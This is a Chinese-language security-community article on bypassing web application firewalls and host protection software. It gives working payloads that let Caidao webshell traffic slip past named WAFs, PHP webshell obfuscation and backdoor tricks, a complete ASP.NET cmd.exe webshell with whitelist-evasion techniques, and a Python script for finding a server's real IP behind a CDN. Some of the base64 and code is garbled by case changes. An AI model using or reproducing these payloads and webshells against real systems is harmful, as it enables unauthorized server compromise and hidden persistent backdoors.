先知技术社区独家发表本文, 如需要转载, 请先联系先知技术社区授权 ; 未经授权请勿转载 先知技术社区投稿邮箱 :Aliyun_xianzhi@service.alibaba.com; 我的 WafBypass 之道 (Misc 篇 ) 0x00 前言 Author:Tr3jer_CongRong Blog:www.Thinkings.org Mail:Tr3jer@gmail.com I am back 再不出这篇就要被笑然老板吊打了 本来这一篇打算写免杀的 考虑了下既然是预期最后一篇那就写个汇总和一些偏门的吧 并且在辍写本文时将前两篇进行了增改 本文主要讲以下几点, 也是讲的并不全, 但是实用 对其进行简单的阐述下 : Bypass 菜刀连接拦截 多数 waf 对请求进行检测时由于事先早已纳入了像菜刀这样的样本 通常 waf 对这块的检测就是基于样本, 所以过于死板 webshell 免杀 讲 webshell 免杀也就直接写写姿势, 一些特性功能 畸形语法 生僻函数比如回调等绕过查杀语法, 不断变种 变种 变种 ( 混淆太恶心了, 将其拿到实战上的人是怎么想的?) Bypass 禁止执行程序 黑客在进行提权时, 主机防护软件安全狗 星外等会进行拦截 原理上都是基于黑白名单进行拦截敏感的程序调用 Bypass CDN 查找原 IP cdn 隐藏了原 ip, 在某种情况上使黑客无法做不正当勾当, 那么自然就有各种绕过的方法 在这里附上一些靠谱的姿势和小工具 0x01 Bypass 菜刀连接拦截 这里写两个案例, 分别稍加修改菜刀的连接原始数据达到 Bypass,very simple 证明拦截规则不能写的原样照搬, 一个简单的一句话, 并基于市面最广的菜刀为样本进行连
接 : 阿里云盾 : 这个 post 数据是绝对会被云盾拦截的 : 基于 waf 专员智力水平, 肯定不是简单处理下请求就能绕过的 这里先将请求拆分, 分别进行请求看看 : @eval%01(base64_decode($_post[z0])); 测试发现过滤了 eval 这个函数, 有意思的是 eval%01( 能被拦截肯定是因为原样照搬了这个菜刀的规则 而且只要在左括号前面插入 %00 就不会拦截, 也就是 : @eval%00(base64_decode%00($_post[z0])); 接下来就是绕过后面这段 base64 了, 这段 base64 解密是段调用机器信息的 php 代码, 拦截的有点暴力也很正常 话说回来, 发现云盾能够将这段 base64 一段一段识别的, 是智能还是只是基于菜刀的样本? QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIp 拦截 QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMC%01Ip 不拦截
QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMC%01IpO0BzZXRfdGltZV9saW1pdC gwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0%2bfcip 拦截 QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMC%01IpO0BzZXRfdGltZV9saW1pdC gwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0%2bfcipozskr D1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKS REPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx 0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIp IGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7J HU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cH d1awqoqhbvc2l4x2dldgv1awqoksk6jyc7jhvzcj0ojhuppyr1wyduyw1lj106qgd ldf9jdxjyzw50x3vzzxioktskui49cghwx3vuyw1lkck7jfiupsioeyr1c3j9ksi7 chjpbnqgjfi7o2vjag8oinw8lsipo2rpzsgpow== 拦截 将这段 base64 三个字符三个字符挨个 fuzz 发现在 %2B 前面插入就不会拦截了 : QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMC%01IpO0BzZXRfdGltZV9saW1pdC gwkttac2v0x21hz2ljx3f1b3rlc19ydw50aw1lkdapo2vjag8oii0%01%2b 所以, 因为云盾没匹配到菜刀的样本, 只要将 %01 这样的空字符插对地方的话, 就可以绕过了 : a=@eval%00(base64_decode%00($_post[z0]));&z0=qgluav9zzxqoimrpc3bs YXlfZXJyb3JzIiwiMC%01IpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3 F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%01%2BfCIpOzskRD1kaXJuYW1lKCRfU0 VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9 TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIo JEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX 2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2 V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2d ldgv1awqoksk6jyc7jhvzcj0ojhuppyr1wyduyw1lj106qgdldf9jdxjyzw50x3vz ZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2Vja G8oInw8LSIpO2RpZSgpOw==
当然, 图方便可以再根据这个绕过规则改下菜刀
主机卫士 360 主机卫士对菜刀的请求将直接判断为 "AttackType":"Caidao webshell" 样本 在eval函数前面插入任意urlencode的字符即可绕过 免杀 免杀基于主机防护软件 这里拿安全狗 云锁 主机卫士举个可用的例子 0x02 webshell mb_convert_encoding( $str, $encoding1,$encoding2 )
这个函数用于编码转换的处理, 验证下这个函数 : 这个图证明的不够的话再来一个,UTF-16BE UTF-16LE 编码不管中英文的字符每个字符都是占两个字节, 那么说回这个函数, 支持转换的编码很全的, 使用这个函数转换成 UTF-16BE 看看 为了用户体验, 主机防护软件对 eval 这类函数只要不被外部可控就不会被拦截 : $str=1; @eval($str); 但只要外部可控就会被拦截
经过处理后即可绕过 : $str=base64_decode("cghwaw5mbygpow=="); //$str=base64_decode(base64_encode($_post['a'])); $str1=mb_convert_encoding($str, "GBK"); @eval($str1); 安全狗 : 主机卫士 :
云锁 : 个人是不会使用这么蠢的后门或者混淆加密什么的, 因为开发者后期维护代码时还是有可能被查到的, 这里只是举个例子 推荐几个方案就是间接利用程序自身来做后门 ( 改的越少越好 / 最好不要使用增添新文件的方式 ): 利用 404 页面在正常程序中多次调用 GET POST Cookie 的代码里 : //$a=$_post['a'];
//%b=$_post['b']; $a($b); //a=assert&b=phpinfo() 利用 ADS 流利用.user.ini //wooyun-drops-tips-3424 0x03 Bypass 禁止执行程序 这里以 Safedog 为例, 最新版 Safedog IIS 4.0 已经不显示禁止 IIS 执行程序的白名单了 : 找了个之前的版本搬一下白名单列表 : %windows%microsoft.net/framework/v1.1.4322/aspnet_wp.exe %windows%microsoft.net/framework/v1.1.4322/csc.exe %windows%microsoft.net/framework/v1.1.4322/vbc.exe %windows%microsoft.net/framework/v2.0.50727/aspnet_wp.exe %windows%microsoft.net/framework/v2.0.50727/csc.exe %windows%microsoft.net/framework/v2.0.50727/vbc.exe %windows%microsoft.net/framework/v4.0.30319/aspnet_wp.exe %windows%microsoft.net/framework/v4.0.30319/csc.exe %windows%microsoft.net/framework/v4.0.30319/vbc.exe %windows%system32/drwatson.exe %windows%system32/drwtsn32 %windows%system32/drwtsn32.exe %windows%system32/vsjitdebugger.exe C:/Windows/Microsoft.Net/Framework/v3.5/csc.exe C:/Windows/Microsoft.Net/Framework/v3.5/vbc.exe 首先一个执行 cmd 小马 : <%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <script Language="c#" runat="server">
protected void FbhN(object sender,eventargs e){ try{ Process ahae=new Process(); ahae.startinfo.filename=path.value; ahae.startinfo.arguments=argm.value; ahae.startinfo.useshellexecute=false; ahae.startinfo.redirectstandardinput=true; ahae.startinfo.redirectstandardoutput=true; ahae.startinfo.redirectstandarderror=true; ahae.start(); string Uoc=ahAE.StandardOutput.ReadToEnd(); Uoc=Uoc.Replace("<","<"); Uoc=Uoc.Replace(">",">"); Uoc=Uoc.Replace("\r\n","<br>"); tnqrf.visible=true; tnqrf.innerhtml="<hr width=\"100%\" noshade/><pre>"+uoc+" </pre>"; }catch(exception error){ Response.Write(error.Message); } } </script> <html> <head> <title>cmd webshell</title> </head> <body> <form id="cmd" method="post" runat="server"> <div runat="server" id="viac"> <p>path:<br /> <input class="input" runat="server" id="path"
type="text" size="100" value="c:\windows\system32\cmd.exe" /> </p> Param: <br /> <input class="input" runat="server" id="argm" value="/c Set" type="text" size="100" /> <asp:button id="yrql" cssclass="bt" runat="server" text="submit" onclick="fbhn" /> <div id="tnqrf" runat="server" visible="false" enableviewstate="false"> </div> </div> </form> </body> </html> 拦截 : 把白名单的内容做为参数进行执行呢 : 成功绕过, 直接封装到 webshell 参数上更方便 :
StartInfo.Arguments=@"/'C:/Windows/Microsoft.NET/Framework/v1.1.4 322/vbc.exe' " + argm.value; 满足这个白名单并使用路径跳转的方式执行程序也可以绕过 : 回首这个白名单, 这个基于白名单识别有个缺陷就是并不是完全的匹配, 而是前面匹配到了则放过 打个比方 : 可以利用 windows 的一个特性将可执行的文件改为.exee, 比如我们使用白名单中的 vsjitdebugger.exe 这个文件名, 上传一个名为 vsjitdebugger.exee 的 cmd 即可 :
0x04 Bypass CDN 查找原 IP 由于 cdn 不可能覆盖的非常完全, 那么可以采用国外多地 ping 的方式, 或者多收集一些小国家的冷门 dns 然后 nslookup domain.com dnsserver 写了个简单的脚本, 首先收集好偏门的 dns 字典, 然后轮训一个目标的方式, 输出这些 dns 查询出的不同结果 https://gist.github.com/tr3jer/98f66fe250eb8b39667f0ef85e4ce5e5 #!/usr/bin/env python # -*- encoding: utf-8 -*- # author == Tr3jer_CongRong import re import sys import time import threading import dns.resolver class Bypass_CDN: def init (self,domain,dns_dict): self.domain = domain self.myresolver = dns.resolver.resolver() self.dns_list = set([d.strip() for d in open(dns_dict)]) self.good_dns_list,self.result_ip = set(),set() def test_dns_server(self,server): self.myresolver.lifetime = self.myresolver.timeout = 2.0 try: self.myresolver.nameservers = [server] sys.stdout.write('[+] Check Dns Server %s \r' % server) sys.stdout.flush() answer = self.myresolver.query('google-public-dnsa.google.com')
if answer[0].address == '8.8.8.8': self.good_dns_list.add(server) except: pass def load_dns_server(self): print '[+] Load Dns Servers...' threads = [] for i in self.dns_list: threads.append(threading.thread(target=self.test_dns_server,args= (i,))) for t in threads: t.start() while True: if len(threading.enumerate()) < len(self.dns_list) / 2: break else: time.sleep(1) print '\n[+] Release The Thread...' for j in threads: j.join() print '[+] %d Dns Servers Available' % len(self.good_dns_list) def ip(self,dns_server): self.myresolver.nameservers = [dns_server] try: result = self.myresolver.query(self.domain) for i in result: self.result_ip.add(str(i.address)) except: pass def run(self): self.load_dns_server() print '[+] Dns Servers Test Target Cdn...' threads = [] for i in self.good_dns_list: threads.append(threading.thread(target=self.ip,args= (i,))) for t in threads: t.start() while True: if len(threading.enumerate()) < len(self.good_dns_list) / 2: break else: time.sleep(1) for j in threads: j.join() for i in self.result_ip: print i
if name == ' main ': dns_dict = 'foreign_dns_servers.txt' bypass = Bypass_CDN(sys.argv[1],dns_dict) bypass.run() 通过 dns 历史解析记录查找目标源 ip, 我推荐使用 Rapid7 的 DNS 解析记录库进行检索, 毕竟做渗透的聪明人都讲究 : 事前早有准备, 而不是临阵磨枪 这里有一份 2014.03 2015.10 的解析记录放在了百度云
的 类型都可以进行检索 基于dns解析hitory还可以使用netcra NS/TXT/MX dns.com 让服务器主动连接 在可上传图片的地方利用目标获取存放在自己服务器的图片 或者任何可pull自己 资源的点 review log即可拿到 通过注册等方式让目标主动发邮件过来 此方法对于大公司几率小 因为出口可能 是统一的邮件服务器 可以尝试扫其MailServer网段 0x05 End. 为完成这个系列 将前两篇也适当的增添了一些 有什么这方面的问题可以在本帖 问 嗯 那就这样吧